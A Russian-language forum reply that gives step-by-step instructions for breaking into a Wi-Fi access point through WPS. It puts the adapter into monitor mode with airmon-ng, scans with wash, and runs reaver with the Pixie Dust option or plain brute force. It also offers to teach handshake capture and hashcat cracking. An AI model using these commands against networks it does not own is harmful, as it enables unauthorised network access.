Показать сообщение отдельно

  #3  
Старый 14.05.2017, 12:35
id2746
Новичок
Регистрация: 13.11.2016
Сообщений: 0
С нами: 4999287

Репутация: 0
По умолчанию

а зачем тебе хендшейк когда там wps включен?
слушай сюда.
заходи в терминал и там пиши - iwconfig. В результате смотри как называется адаптер который ты будешь использовать для атаки, например wlan1.
Потом в терминале пиши: airmon-ng start wlan1- так ты переведешь адаптер в режим монитора и сможешь начинать тестирование своей точки на уязвимости.

Далее в терминале пиши wash -i wlan1mon(после перевода твоего адаптераwlan1в режим монитора его название станетwlan1mon, может и другим, это ты увидишь в терминале, но в большинстве случаев именно таким)

Получишь результаты сканирования в которых увидишь точки с включенным wps. Окно не закрывай, результаты из него пригодятся в следующем шаге.

Открываешь терминал и там пишешь:

reaver-i wlan1mon -bмакадрессТДканал-f -K 1
- макадрессТД - копируешь из предыдущего окна, это мак тестируемой ТД;
- канал - смотришь там же;
-f опция, которая отключает прыгание по канал во время тестирования, просто оставь как есть
-K 1 - атака по пиксидаст, в ряде случаев отдаст тебе пароль за 10 секунд. Если не сработало увидишь сообщение и начинай атаку без этого параметра, т.е. reaver-i wlan1mon -bмакадрессТДканал-f
Чтобы видеть развернутый ход атаки допиши в конце-vv

ИТОГО, на выходе команда:
reaver-i wlan1mon -bмакадрессТДканал-f -K 1
либо
reaver-i wlan1mon -bмакадрессТДканал-f -vv

Дальше можно идти курить на пару часов, при условии, что на целевой ТД нет блокировок от брута wps.

П.С. Если не поможет пиши, научу
ловить хендшейки брутить его нахешкетес офигенной скоростью.

Банзай!
 
Ответить с цитированием